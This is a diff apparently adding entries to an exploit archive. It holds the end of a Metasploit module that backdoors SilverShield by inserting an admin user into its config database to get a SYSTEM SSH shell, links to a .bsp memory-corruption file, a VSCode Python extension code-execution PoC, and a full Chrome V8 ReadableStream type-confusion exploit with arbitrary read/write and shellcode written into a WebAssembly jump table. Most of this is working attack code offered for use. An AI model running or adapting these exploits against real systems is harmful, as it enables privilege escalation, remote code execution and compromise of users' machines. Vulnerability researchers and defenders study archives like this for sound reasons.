+      'DisclosureDate'=> "Jul 31 2019",
+      'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
+    ))
+
+    register_options([
+      OptPort.new('PF_PORT', [ true, 'Local port to PortFwd to victim', 20022 ]),
+      OptString.new('SS_IP', [ false, 'IP address SilverShield is listening on at the victim. Leave blank to detect.', '' ]),
+      OptPort.new('SS_PORT', [ false, 'Port SilverShield is listening on at the victim.  Leave at 0 to detect.', 0 ]),
+      OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
+      OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 15])
+    ])
+  end
+
+  
+
+  # Grabbed this bit from another exploit I was pulling apart... Need to trick the SSH session a bit
+  module ItsAShell
+    def _check_shell(*args)
+      true
+    end
+  end
+  
+  
+  
+  # helper methods that normally come from Tcp
+  def rhost
+    return '127.0.0.1'
+  end
+  def rport
+    datastore['PF_PORT']
+  end
+
+  
+
+  # Does a basic check of SilverShield... Does not fail if there is a problem, but will return false
+  def do_check_internal()
+  
+    looks_ok = true    # lets assume everything is OK...
+  
+    # Try to get the path of the SilverShield service...
+    ss_serviceinfo = service_info("SilverShield")
+    ss_servicepath = ss_serviceinfo[:path]
+    if (ss_servicepath == '')
+        print_warning("Vulnerable Silvershield service is likely NOT running on the target system")
+        looks_ok = false
+    else
+        print_good("Silvershield service found: " + ss_servicepath)
+    end
+
+
+    # Try to read the version of Silvershield from the resigstry of the victim...
+    ss_version = ""
+    begin
+      ss_version = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SOFTWARE\\extenua\\SilverShield', KEY_READ).query_value("Version").data
+    rescue ::Exception => e
+      print_warning "Cannot find SilverShield version in registry.  Victim may not have vulnerable SilverShield installed"
+      looks_ok = false
+    end
+    if ss_version != ""
+      print_good("Silvershield version from registry: " + ss_version)
+      if ss_version[0..1] != "6."    # If not version "6." something ?  then this will not work...
+        print_warning("This version is not likely vulnerable to this module")
+        looks_ok = false
+      end      
+    end  
+    return looks_ok
+    
+  end
+  
+ 
+  
+  
+  # Attempts a single SSH login to the victim via the local port forwarded to fictim.  Returns valid connection if OK
+  def do_login()
+    factory = Rex::Socket::SSHFactory.new(framework,self, datastore['Proxies'])
+    opt_hash = {
+      :auth_methods    => ['password'],
+      :port            => rport,
+      :use_agent       => false,
+      :config          => false,
+      :proxy           => factory,
+      :password        => @@the_password,
+      :non_interactive => true,
+      :verify_host_key => :never
+    }
+    opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
+    begin
+      ssh_socket = nil
+      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
+        ssh_socket = Net::SSH.start(rhost, 'haxor4', opt_hash)
+      end
+    rescue Rex::ConnectionError
+      return
+    rescue Net::SSH::Disconnect, ::EOFError
+      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
+      return
+    rescue ::Timeout::Error
+      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
+      return
+    rescue Net::SSH::AuthenticationFailed
+      print_error "#{rhost}:#{rport} SSH - Failed authentication"
+    rescue Net::SSH::Exception => e
+      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
+      return
+    end
+
+    if ssh_socket
+      # Create a new session from the socket, then dump it.
+      conn = Net::SSH::CommandStream.new(ssh_socket)
+      ssh_socket = nil
+      return conn
+    else
+      return false
+    end
+  end
+
+  
+  
+  # Attempts several times to connect through session back to SilverShield as haxor then open resulting shell as a new session.
+  def exploit_sub
+    x = 0
+    while x < 5 do 
+        x = x + 1
+        print_status "SSH login attempt " + x.to_s + ".  May take a moment..."
+
+        conn = do_login()
+        if conn
+          print_good "Successful login.  Passing to handler..."
+          handler(conn.lsock)
+          return true
+        end
+    end     
+    return false
+  end
+
+
+  
+  def check()
+    if do_check_internal
+        Exploit::CheckCode::Appears
+    else
+        Exploit::CheckCode::Safe
+    end
+  end
+  
+  
+  
+  # The guts of it...
+  def exploit
+  
+    # Some basic setup...
+    payload_instance.extend(ItsAShell)
+    factory = ssh_socket_factory
+    
+    
+    # Do a quick check... well, sort of, just shows info.  We won't stop, just report to user...
+    do_check_internal()
+    
+    
+    # We will generate a NEW password and salt.  Then get the relevant hash to inject...
+    @@the_password = SecureRandom.hex
+    @@the_password_salt = SecureRandom.hex[0..7]
+    @@the_password_hash = Digest::MD5.hexdigest @@the_password_salt + @@the_password
+    vprint_status("generated- user:haxor4  password:" + @@the_password + " salt:" + @@the_password_salt + " => hash(md5):" + @@the_password_hash)
+
+
+    # Get a tempfile on the local system.  Garbage collection will automaticlly kill it off later...
+    # This is a temp location where we will put the sqlite database so we can work on it on the local machine...
+    tfilehandle = Tempfile.new('ss.db.')
+    tfilehandle.close
+    wfile = tfilehandle.path
+
+
+    #Try to get the ProgramData path from the victim, this is where the SQLite databasae is held...
+    progdata = session.fs.file.expand_path("%ProgramData%")    # client.sys.config.getenv('PROGRAMDATA')
+    print_status 'Remote %ProgramData% = ' + progdata
+
+
+    # Lets check the file exists, then download from the victim to the local file system...
+    filecheck = progdata + '\SilverShield\SilverShield.config.sqlite'
+    fsrc = filecheck
+    fdes = wfile  
+    print_status 'Try download: ' + fsrc + '  to: ' + fdes
+    begin
+      ::Timeout.timeout(5) do
+            session.fs.file.download_file(fdes, fsrc)
+      end
+    rescue ::Exception => e
+      print_error "Cannot download #{fsrc} to #{fdes}  #{e.class} : #{e.message}"
+      print_error "Does victim even have vulnerable SilverShield installed ?"
+      fail_with(Failure::Unknown, "Fail download")
+    end
+
+
+    # Try to connect with sqlite locally...
+    vprint_status 'Trying to open database ' + wfile
+    db = SQLite3::Database.open wfile
+
+
+    # Remove haxor4 if its already there, just incase by pure chance a user with that name already exists...
+    vprint_status 'remove user "haxor4" if its already in there...'
+    results = db.execute "delete from USERS where vcusername='haxor4'"
+    answer = ""
+    results.each { |row| answer = answer + row.join(',') }
+
+
+    # Insert the haxor user... we will use this later to connect back in as SYSTEM
+    vprint_status 'insert user "haxor4" with password "' + @@the_password + '" into database'
+    results = db.execute "INSERT INTO USERS (CUSERID, VCUSERNAME, CSALT,CPASSWORD, VCHOMEDIR, BGETFILE, BPUTFILE, BDELFILE, BMODFILE, BRENFILE, BLISTDIR, BMAKEDIR, BDELDIR, BRENDIR, IAUTHTYPES, BAUTHALL, BALLOWSSH, BALLOWSFTP, BALLOWFWD, BALLOWDAV, IACCOUNTSTATUS, BAUTODISABLE, DTAUTODISABLE, BWINPASSWD, BISADMIN)VALUES(\"{11112222-3333-4444-5555666677778888}\",\"haxor4\",\"" + @@the_password_salt + "\",\"" + @@the_password_hash + "\",\"c:\\\",1,1,1,1,1,1,1,1,1,20,0,1,0,0,0,0,0,-700000.0, 0, 1);"
+    answer = ""
+    results.each { |row| answer = answer + row.join(',') }
+    print_good 'user inserted OK'
+
+
+    # Dump out local port that SilverShield has been configured to listen on at the victim machine...
+    results = db.execute "select IPORT from maincfg"
+    answer = ""
+    results.each { |row| answer = answer + row.join(',') }
+    ss_port = answer
+    print_status "SilverShield config shows listening on port: " + ss_port
+    if (datastore['SS_PORT'] != 0) 
+        ss_port = datastore['SS_PORT'].to_s
+        print_status "SS_PORT setting forcing port to " + ss_port
+    end
+    if (ss_port == '')
+        ss_port = '22'
+    end
+
+
+    # Dump out local IP that SilverShield has been configured to listen on at the victim machine...
+    results = db.execute "select CBINDIP from maincfg"
+    answer = ""
+    results.each { |row| answer = answer + row.join(',') }
+    ss_ip = answer
+    print_status "SilverShield config shows listening on local IP: " + ss_ip
+    if (datastore['SS_IP'] != '') 
+        ss_ip = datastore['SS_IP']
+        print_status "SS_IP setting forcing IP to " + ss_ip
+    end
+    # If the override AND the detection have come up with nothing, then use the default 127.0.0.1
+    if (ss_ip == '') 
+        ss_ip = '127.0.0.1'
+    end
+
+
+    # Close the database. Keep it neat
+    db.close
+
+
+    # Now lets upload this file back to the victim...due to bad folder permissions, we can sneak our bad config back in.  Yay
+    fdes = filecheck  
+    fsrc = wfile
+    print_status 'Sending modded file back to victim' 
+    begin
+      ::Timeout.timeout(5) do
+            session.fs.file.upload_file(fdes, fsrc)
+      end
+    rescue ::Exception => e
+      print_error "Cannot upload #{fsrc} to #{fdes}  #{e.class} : #{e.message}"
+      print_error "Perhaps this server is not vulnerable or has some other mitigation."
+      fail_with(Failure::Unknown, "Fail upload")
+    end
+    sleep 4   # wait a few seconds... this gives the SilverShield service some time to see the settings have changed.
+
+
+    # Delete the port if its already pointing somewhwere...  This a bit ugly and may generate an error, but I don't care.
+    client.run_cmd("portfwd delete -l " + datastore['PF_PORT'].to_s)
+
+
+    # Forward a local port through to the ssh port on the victim. 
+    client.run_cmd("portfwd add -l " + datastore['PF_PORT'].to_s + " -p " + ss_port + " -r " + ss_ip)
+
+
+    # Now do ssh work and hand off the session to the handler...
+    exploit_sub
+
+  end 
+
+end
\ No newline at end of file
diff --git a/exploits/multiple/local/48187.txt b/exploits/multiple/local/48187.txt
new file mode 100644
index 000000000..17ae14fb6
--- /dev/null
+++ b/exploits/multiple/local/48187.txt
@@ -0,0 +1,3 @@
+So I’ve been holding onto this neat little gem of a .bsp that has four bytes very close to the end of the file that controls the memory allocator. See above picture. Works on all supported operating systems last I checked (so Linux, Windows, and macOS), even after a few years.
+
+Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48187.bsp
\ No newline at end of file
diff --git a/exploits/multiple/local/48231.md b/exploits/multiple/local/48231.md
new file mode 100644
index 000000000..a4029b61b
--- /dev/null
+++ b/exploits/multiple/local/48231.md
@@ -0,0 +1,16 @@
+# VSCode Python Extension Code Execution
+
+This repository contains the Proof-of-Concept of a code execution vulnerability discovered in the [Visual Studio Code](https://code.visualstudio.com/) Python extension.
+
+>TL;DR: VScode may use code from a virtualenv found in the project folders without asking the user, for things such as formatting, autocompletion, etc. This insecure design leads to arbitrary code execution by simply cloning and opening a malicious Python repository.
+
+You can read more about this vulnerability on our blog: [https://blog.doyensec.com/2020/03/16/vscode_codeexec.html](https://blog.doyensec.com/2020/03/16/vscode_codeexec.html).
+
+## HowTo
+
+- Clone the 'malicious' repository with `git clone https://github.com/doyensec/VSCode_PoC_Oct2019.git`
+- Add the cloned repo to a VSCode workspace on macOS. Note that the vulnerability affects all platforms, but the PoC is executing *Calculator.app*
+- Open `test.py` in VScode
+
+
+Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48231.zip
\ No newline at end of file
diff --git a/exploits/multiple/remote/46654.html b/exploits/multiple/remote/46654.html
new file mode 100644
index 000000000..7f29eb8bc
--- /dev/null
+++ b/exploits/multiple/remote/46654.html
@@ -0,0 +1,555 @@
+<!--
+VULNERABILITY DETAILS
+==1. TriggerPromiseReactions==
+https://cs.chromium.org/chromium/src/v8/src/objects.cc?rcl=d24c8dd69f1c7e89553ce101272aedefdb41110d&l=5975
+Handle<Object> JSPromise::TriggerPromiseReactions(Isolate* isolate,
+                                                  Handle<Object> reactions,
+                                                  Handle<Object> argument,
+                                                  PromiseReaction::Type type) {
+  DCHECK(reactions->IsSmi() || reactions->IsPromiseReaction());
+
+  // We need to reverse the {reactions} here, since we record them
+  // on the JSPromise in the reverse order.
+  {
+    DisallowHeapAllocation no_gc;
+    Object current = *reactions;
+    Object reversed = Smi::kZero;
+    while (!current->IsSmi()) {
+      Object next = PromiseReaction::cast(current)->next(); // ***1***
+      PromiseReaction::cast(current)->set_next(reversed);
+      reversed = current;
+      current = next;
+    }
+    reactions = handle(reversed, isolate);
+  }
+[...]
+
+A Semmle query has triggered a warning that |TriggerPromiseReactions| performs a
+typecast on the |reactions| argument without prior checks[1]. Upon further
+inspection, it turned out that the JSPromise class reuses a single field to
+store both the result object and the reaction list (chained callbacks).
+Moreover, |JSPromise::Fulfill| and |JSPromise::Reject| don't ensure that the
+promise is still in the "pending" state, instead they rely on the default
+|resolve/reject| callbacks that are exposed to user JS code and use the
+|PromiseBuiltins::kAlreadyResolvedSlot| context variable to determine whether
+the promise has been resolved yet. So, it's enough to call, for example,
+|JSPromise::Fulfill| twice on the same Promise object to trigger the type
+confusion.
+
+
+==2. Thenable objects and JSPromise::Resolve==
+https://cs.chromium.org/chromium/src/v8/src/objects.cc?rcl=d24c8dd69f1c7e89553ce101272aedefdb41110d&l=5902
+MaybeHandle<Object> JSPromise::Resolve(Handle<JSPromise> promise,
+                                       Handle<Object> resolution) {
+[...]
+  // 8. Let then be Get(resolution, "then").
+  MaybeHandle<Object> then;
+  if (isolate->IsPromiseThenLookupChainIntact(
+          Handle<JSReceiver>::cast(resolution))) {
+    // We can skip the "then" lookup on {resolution} if its [[Prototype]]
+    // is the (initial) Promise.prototype and the Promise#then protector
+    // is intact, as that guards the lookup path for the "then" property
+    // on JSPromise instances which have the (initial) %PromisePrototype%.
+    then = isolate->promise_then();
+  } else {
+    then =
+        JSReceiver::GetProperty(isolate, Handle<JSReceiver>::cast(resolution),
+                                isolate->factory()->then_string()); // ***2***
+[...]    
+
+This is a known behavior, and yet it has already caused some problems in the
+past (see https://bugs.chromium.org/p/chromium/issues/detail?id=663476#c10).
+When the promise resolution is an object that has the |then| property, |Resolve|
+synchronously accesses that property and might invoke a user-defined getter[2],
+which means it's possible to run user JavaScript while the promise is in the
+middle of the resolution process. However, just calling the |resolve| callback
+inside the getter is not enough to trigger the type confusion because of the
+|kAlreadyResolvedSlot| check. Instead, one should look for places where
+|JSPromise::Resolve| is called directly.
+
+
+==3. V8 extras and ReadableStream==
+https://cs.chromium.org/chromium/src/third_party/blink/renderer/core/streams/ReadableStream.js?rcl=d67a775151929f516380749eae3b32f514eade11&l=425
+  function ReadableStreamTee(stream) {
+    const reader = AcquireReadableStreamDefaultReader(stream);
+
+    let closedOrErrored = false;
+    let canceled1 = false;
+    let canceled2 = false;
+    let reason1;
+    let reason2;
+    const cancelPromise = v8.createPromise();
+
+    function pullAlgorithm() {
+      return thenPromise(
+          ReadableStreamDefaultReaderRead(reader), ({value, done}) => {
+            if (done && !closedOrErrored) {
+              if (!canceled1) {
+                ReadableStreamDefaultControllerClose(branch1controller); // ***3***
+              }
+              if (!canceled2) {
+                ReadableStreamDefaultControllerClose(branch2controller);
+              }
+              closedOrErrored = true;
+            }
+[...]
+    function cancel1Algorithm(reason) {
+      canceled1 = true; // ***4***
+      reason1 = reason;
+      if (canceled2) {
+        const cancelResult = ReadableStreamCancel(stream, [reason1, reason2]);
+        resolvePromise(cancelPromise, cancelResult);
+      }
+      return cancelPromise;
+    }
+[...]
+  function ReadableStreamCancel(stream, reason) {
+    stream[_readableStreamBits] |= DISTURBED;
+
+    const state = ReadableStreamGetState(stream);
+    if (state === STATE_CLOSED) {
+      return Promise_resolve(undefined);
+    }
+    if (state === STATE_ERRORED) {
+      return Promise_reject(stream[_storedError]);
+    }
+
+    ReadableStreamClose(stream);
+
+    const sourceCancelPromise =
+          ReadableStreamDefaultControllerCancel(stream[_controller], reason);
+    return thenPromise(sourceCancelPromise, () => undefined);
+  }
+
+  function ReadableStreamClose(stream) {
+    ReadableStreamSetState(stream, STATE_CLOSED);
+
+    const reader = stream[_reader];
+    if (reader === undefined) {
+      return;
+    }
+
+    if (IsReadableStreamDefaultReader(reader) === true) {
+      reader[_readRequests].forEach(
+          request =>
+            resolvePromise(
+                request.promise,
+                ReadableStreamCreateReadResult(undefined, true,
+                                               request.forAuthorCode)));
+      reader[_readRequests] = new binding.SimpleQueue();
+    }
+
+    resolvePromise(reader[_closedPromise], undefined);
+  }
+
+A tiny part of Blink (namely, Streams API) is implemented as a v8 extra, i.e., a
+set of JavaScript classes with a couple of internal v8 methods exposed to them.
+The relevant ones are |v8.resolvePromise| and |v8.rejectPromise|, as they just
+call |JSPromise::Resolve/Reject| and don't check the status of the promise
+passed as an argument. Instead, the JS code around them defines a bunch of
+boolean variables to track the stream's state. Unfortunately, there's a scenario
+in which the state checks could be bypassed:
+1. Create a new ReadableStream with an underlying source object that exposes the
+stream controller's |stop| method.
+2. Call the |tee| method to create a pair of child streams.
+3. Make a read request for one of the child streams thus putting a new Promise
+object to the |_readRequests| queue.
+4. Define a getter for the |then| property on Object.prototype. From this point
+every promise resolution where the resolution object inherits from
+Object.prototype will call the getter.
+5. Call |cancel| on the child stream. The call stack will eventually look like:
+ReadableStreamCancel -> ReadableStreamClose -> resolvePromise ->
+JSPromise::Resolve -> the |then| getter.
+6. Inside the getter, calling regular methods on the child stream won't work
+because its state is already set to "closed", but an attacker can call the
+controller's |stop| method. Because |ReadableStreamClose| is executed before the
+cancel callback[4], the |cancel1| flag won't be set yet, so the |close| method
+will be called again[3] resolving the promise that is currently in the middle
+of the resolution process.
+
+The only problem here is the code [3] gets executed as another promise's
+reaction, i.e. as a microtask, and microtasks are supposed to be executed
+asynchronously.
+
+
+==4. MicrotasksScope==
+V8 exposes the MicrotasksScope class to Blink to control microtask execution.
+MicrotasksScope's destructor will run all scheduled microtasks synchronously, if
+the object that's being destructed is the top-level MicrotasksScope.  Therefore,
+calling a Blink method that instantiates a MicrotasksScope should allow running
+the scheduled promise reaction[3] synchronously. However, usually all JS code
+(<script> body, event handlers, timeouts) already runs inside a MicrotasksScope.
+One way to overcome this is to define the JS code as the |handleEvent| property
+getter of an EventListener object and add the listener to, e.g., the |load|
+event.
+
+Putting it all together, the PoC is as follows:
+<body>
+<script>
+performMicrotaskCheckpoint = () => {
+  document.createNodeIterator(document, -1, {
+    acceptNode() {
+      return NodeFilter.FILTER_ACCEPT;
+  } }).nextNode();
+}
+
+runOutsideMicrotasksScope = func => {
+  window.addEventListener("load", { get handleEvent() {
+    func();
+  } });
+}
+
+runOutsideMicrotasksScope (() => {
+  let stream = new ReadableStream({ start(ctr) { controller = ctr } });
+  let tee_streams = stream.tee();
+  let reader = tee_streams[0].getReader();
+  reader.read();
+  let then_counter = 0;
+
+  Object.prototype.__defineGetter__("then", function() {
+    if (++then_counter == 1) {
+      controller.close();
+      performMicrotaskCheckpoint();
+    }
+  });
+  reader.cancel();
+});
+</script>
+</body>
+
+
+==5. Exploitation==
+The bug allows an attacker to make the browser treat the object of their choice
+as a PromiseReaction. If the second qword of the object contains a value that
+looks like a tagged pointer, |TriggerPromiseReactions| will treat it as a
+pointer to another PromiseReaction in the reaction chain and try to reverse the
+chain. This primitive is not very useful without a separate info leak bug. If
+the second qword looks like a Smi, the method will overwrite the first, third
+and fourth qwords with tagged pointers. So, if the attacker allocates a
+HeapNumber and a FixedDobuleArray that are adjacent to each other, and the
+umber's value has its LSB set to 0, the function will overwrite the array's
+length with a pointer that looks like a sufficiently large Smi. The array's map
+pointer will also get corrupted, but that's not important (at least, for release
+builds).
+
+-----------------------------------------------------------------
+|     HeapNumber    ||              FixedDoubleArray            |
+-----------------------------------------------------------------
+|    Map    | Value ||    Map    |   Length   | Element 0 | ... |
+-----------------------------------------------------------------
+
+Once the attacker has the relative read/write primitive, it's easy to construct
+the pointer leak and arbitrary read/write primitives by finding the offsets of a
+couple other objects allocated next to the array. Finally, to execute the
+shellcode the exploit overwrites the jump table of a WebAssembly function, which
+is stored in a RWX memory page.
+
+Exploit (the shellcode runs gnome-calculator on linux x64):
+-->
+
+<body>
+<script>
+performMicrotaskCheckpoint = () => {
+  document.createNodeIterator(document, -1, {
+    acceptNode() {
+      return NodeFilter.FILTER_ACCEPT;
+  } }).nextNode();
+}
+
+runOutsideMicrotasksScope = func => {
+  window.addEventListener("load", { get handleEvent() {
+    func();
+  } });
+}
+
+let data_view = new DataView(new ArrayBuffer(8));
+reverseDword = dword => {
+  data_view.setUint32(0, dword, true);
+  return data_view.getUint32(0, false);
+}
+
+reverseQword = qword => {
+  data_view.setBigUint64(0, qword, true);
+  return data_view.getBigUint64(0, false);
+}
+
+floatAsQword = float => {
+  data_view.setFloat64(0, float);
+  return data_view.getBigUint64(0);
+}
+
+qwordAsFloat = qword => {
+  data_view.setBigUint64(0, qword);
+  return data_view.getFloat64(0);
+}
+
+let oob_access_array;
+let ptr_leak_object;
+let arbirary_access_array;
+let ptr_leak_index;
+let external_ptr_index;
+const MARKER = 0x31337;
+
+leakPtr = obj => {
+  ptr_leak_object[0] = obj;
+  return floatAsQword(oob_access_array[ptr_leak_index]);
+}
+
+getQword = address => {
+  oob_access_array[external_ptr_index] = qwordAsFloat(address);
+  return arbirary_access_array[0];
+}
+
+setQword = (address, value) => {
+  oob_access_array[external_ptr_index] = qwordAsFloat(address);
+  arbirary_access_array[0] = value;
+}
+
+getField = (object_ptr, num, tagged = true) =>
+  object_ptr + BigInt(num * 8 - (tagged ? 1 : 0));
+
+setBytes = (address, array) => {
+  for (let i = 0; i < array.length; ++i) {
+    setQword(address + BigInt(i), BigInt(array[i]));
+  }
+}
+
+// ------------------------- \\
+
+runOutsideMicrotasksScope (() => {
+  oob_access_array = Array(16).fill(1.1);
+  ptr_leak_object = {};
+  arbirary_access_array = new BigUint64Array(1);
+  oob_access_array.length = 0;
+
+  const heap_number_to_corrupt = qwordAsFloat(0x10101010n);
+  oob_access_array[0] = 1.1;
+  ptr_leak_object[0] = MARKER;
+  arbirary_access_array.buffer;
+
+  let stream = new ReadableStream({ start(ctr) { controller = ctr } });
+  let tee_streams = stream.tee();
+  let reader = tee_streams[0].getReader();
+  reader.read();
+  reader.read();
+  let then_counter = 0;
+
+  Object.prototype.__defineGetter__("then", function() {
+    let counter_value = ++then_counter;
+    if (counter_value == 1) {
+      controller.close();
+      performMicrotaskCheckpoint();
+      throw 0x123;
+    } else if (counter_value == 2) { 
+      throw heap_number_to_corrupt;
+    } else if (counter_value == 4) {
+      oob_access_array.length = 60;
+      
+      findOffsets();
+      runCalc();
+    }
+  });
+  reader.cancel();
+});
+
+findOffsets = () => {
+  let markerAsFloat = qwordAsFloat(BigInt(MARKER) << 32n);
+  for (ptr_leak_index = 0; ptr_leak_index < oob_access_array.length;
+      ++ptr_leak_index) {
+    if (oob_access_array[ptr_leak_index] === markerAsFloat) {
+      break;
+    }
+  }
+
+  let oneAsFloat = qwordAsFloat(1n << 32n);
+  for (external_ptr_index = 2; external_ptr_index < oob_access_array.length;
+      ++external_ptr_index) {
+    if (oob_access_array[external_ptr_index - 2] === oneAsFloat &&
+        oob_access_array[external_ptr_index - 1] === 0) {
+      break;
+    }
+  }
+
+  if (ptr_leak_index === oob_access_array.length ||
+      external_ptr_index === oob_access_array.length) {
+    throw "Couldn't find the offsets";
+  }
+}
+
+runCalc = () => {
+  const wasm_code = new Uint8Array([
+    0x00, 0x61, 0x73, 0x6d, 0x01, 0x00, 0x00, 0x00,
+    0x01, 0x85, 0x80, 0x80, 0x80, 0x00, 0x01, 0x60,
+    0x00, 0x01, 0x7f, 0x03, 0x82, 0x80, 0x80, 0x80,
+    0x00, 0x01, 0x00, 0x06, 0x81, 0x80, 0x80, 0x80,
+    0x00, 0x00, 0x07, 0x85, 0x80, 0x80, 0x80, 0x00,
+    0x01, 0x01, 0x61, 0x00, 0x00, 0x0a, 0x8a, 0x80,
+    0x80, 0x80, 0x00, 0x01, 0x84, 0x80, 0x80, 0x80,
+    0x00, 0x00, 0x41, 0x00, 0x0b
+  ]);
+  const wasm_instance = new WebAssembly.Instance(
+    new WebAssembly.Module(wasm_code));
+  const wasm_func = wasm_instance.exports.a;
+
+  const shellcode = [
+    0x48, 0x31, 0xf6, 0x56, 0x48, 0x8d, 0x3d, 0x32,
+    0x00, 0x00, 0x00, 0x57, 0x48, 0x89, 0xe2, 0x56,
+    0x48, 0x8d, 0x3d, 0x0c, 0x00, 0x00, 0x00, 0x57,
+    0x48, 0x89, 0xe6, 0xb8, 0x3b, 0x00, 0x00, 0x00,
+    0x0f, 0x05, 0xcc, 0x2f, 0x75, 0x73, 0x72, 0x2f,
+    0x62, 0x69, 0x6e, 0x2f, 0x67, 0x6e, 0x6f, 0x6d,
+    0x65, 0x2d, 0x63, 0x61, 0x6c, 0x63, 0x75, 0x6c,
+    0x61, 0x74, 0x6f, 0x72, 0x00, 0x44, 0x49, 0x53,
+    0x50, 0x4c, 0x41, 0x59, 0x3d, 0x3a, 0x30, 0x00
+  ];
+
+  wasm_instance_ptr = leakPtr(wasm_instance);
+  const jump_table = getQword(getField(wasm_instance_ptr, 32));
+  setBytes(jump_table, shellcode);
+  wasm_func();
+}
+</script>
+</body>
+
+<!--
+VERSION
+Google Chrome 72.0.3626.96 (Official Build) (64-bit)
+Google Chrome 74.0.3702.0 (Official Build) dev (64-bit)
+
+The Chrome team has landed a fix for the issue, but there's a way to bypass it.
+From Chromium's bug tracker:
+
+Sadly, there's still a way to bypass the latest fix. The fix prevents multiple resolution when all
+the calls come from the |v8.resolvePromise| or |v8.rejectPromise| method exposed to v8 extras.
+However, |ReadableStreamReaderGenericRelease| might use the regular |Promise.reject| method to
+create an initially rejected promise and store it in |reader[_closedPromise]|:
+https://cs.chromium.org/chromium/src/third_party/blink/renderer/core/streams/ReadableStream.js?rcl=bf33c15cd092ea27c870a5a115d138700737cb5e&l=722
+  function ReadableStreamReaderGenericRelease(reader) {
+    // TODO(yhirano): Remove this when we don't need hasPendingActivity in
+    // blink::UnderlyingSourceBase.
+    const controller = reader[_ownerReadableStream][_controller];
+    if (controller[_readableStreamDefaultControllerBits] &
+        BLINK_LOCK_NOTIFICATIONS) {
+      // The stream is created with an external controller (i.e. made in
+      // Blink).
+      const lockNotifyTarget = controller[_lockNotifyTarget];
+      callFunction(lockNotifyTarget.notifyLockReleased, lockNotifyTarget);
+    }
+
+    if (ReadableStreamGetState(reader[_ownerReadableStream]) ===
+        STATE_READABLE) {
+      rejectPromise(
+          reader[_closedPromise],
+          new TypeError(errReleasedReaderClosedPromise));
+    } else {
+      reader[_closedPromise] =
+          Promise_reject(new TypeError(errReleasedReaderClosedPromise)); // ********
+    }
+
+Then, |ReadableStreamClose| might try to resolve it:
+https://cs.chromium.org/chromium/src/third_party/blink/renderer/core/streams/ReadableStream.js?rcl=bf33c15cd092ea27c870a5a115d138700737cb5e&l=541
+  function ReadableStreamClose(stream) {
+    ReadableStreamSetState(stream, STATE_CLOSED);
+
+    const reader = stream[_reader];
+    if (reader === undefined) {
+      return;
+    }
+
+    if (IsReadableStreamDefaultReader(reader) === true) {
+      reader[_readRequests].forEach(
+          request =>
+            resolvePromise(
+                request.promise,
+                ReadableStreamCreateReadResult(undefined, true,
+                                               request.forAuthorCode)));
+      reader[_readRequests] = new binding.SimpleQueue();
+    }
+
+    resolvePromise(reader[_closedPromise], undefined); // ********
+  }
+
+It's not possible to call |ReadableStreamReaderGenericRelease| until the
+|reader[_readRequests]| queue is empty, so an attacker has to call the |close| method twice as in
+the original repro case. The call succeeds because |resolvePromise| acts a silent no-op.
+
+Since the promise is already rejected when it's passed to |v8.resolvePromise|, the code hits the
+assertion added to |PromiseInternalResolve| in the previous patch. It turns out that there's a
+JSCallReducer optimization for |v8.resolvePromise| that doesn't generate the same assertion,
+so the attacker can trigger optimization of |ReadableStreamCancel| to bypass the check:
+https://cs.chromium.org/chromium/src/v8/src/compiler/js-call-reducer.cc?rcl=fee9be7abb565fc2f2ae7c20e7597bece4fc7144&l=5727
+Reduction JSCallReducer::ReducePromiseInternalResolve(Node* node) {
+  DCHECK_EQ(IrOpcode::kJSCall, node->opcode());
+  Node* promise = node->op()->ValueInputCount() >= 2
+                      ? NodeProperties::GetValueInput(node, 2)
+                      : jsgraph()->UndefinedConstant();
+  Node* resolution = node->op()->ValueInputCount() >= 3
+                         ? NodeProperties::GetValueInput(node, 3)
+                         : jsgraph()->UndefinedConstant();
+  Node* frame_state = NodeProperties::GetFrameStateInput(node);
+  Node* context = NodeProperties::GetContextInput(node);
+  Node* effect = NodeProperties::GetEffectInput(node);
+  Node* control = NodeProperties::GetControlInput(node);
+
+  // Resolve the {promise} using the given {resolution}.
+  Node* value = effect =
+      graph()->NewNode(javascript()->ResolvePromise(), promise, resolution,
+                       context, frame_state, effect, control);
+
+  ReplaceWithValue(node, value, effect, control);
+  return Replace(value);
+}
+
+Repro:
+<body>
+<script>
+performMicrotaskCheckpoint = () => {
+  document.createNodeIterator(document, -1, {
+    acceptNode() {
+      return NodeFilter.FILTER_ACCEPT;
+  } }).nextNode();
+}
+
+runOutsideMicrotasksScope = func => {
+  window.addEventListener("load", { get handleEvent() {
+    func();
+  } });
+}
+
+for (let i = 0; i < 100000; ++i) {
+  let stream = new ReadableStream();
+  let reader = stream.getReader();
+  reader.cancel();
+}
+
+runOutsideMicrotasksScope (() => {
+  let stream = new ReadableStream({ start(ctr) { controller = ctr } });
+  let tee_streams = stream.tee();
+  let reader = tee_streams[0].getReader();
+  reader.read();
+  let then_counter = 0;
+
+  Object.prototype.__defineGetter__("then", function() {
+    if (++then_counter == 1) {
+      controller.close();
+      performMicrotaskCheckpoint();
+      reader.releaseLock();
+    }
+  });
+  reader.cancel();
+});
+</script>
+</body>
+
+(lldb) bt
+* thread #1, name = 'chrome', stop reason = signal SIGSEGV: address access protected (fault address: 0x30fd824804e8)
+  * frame #0: 0x0000555cf8057317 chrome`Builtins_RejectPromise + 55
+    frame #1: 0x0000555cf801f7cc chrome`Builtins_RunMicrotasks + 556
+    frame #2: 0x0000555cf7fff598 chrome`Builtins_JSRunMicrotasksEntry + 120
+    frame #3: 0x0000555cf7b3e405 chrome`v8::internal::(anonymous namespace)::Invoke(v8::internal::Isolate*, v8::internal::(anonymous namespace)::InvokeParams const&) + 549
+    frame #4: 0x0000555cf7b3e895 chrome`v8::internal::(anonymous namespace)::InvokeWithTryCatch(v8::internal::Isolate*, v8::internal::(anonymous namespace)::InvokeParams const&) + 101
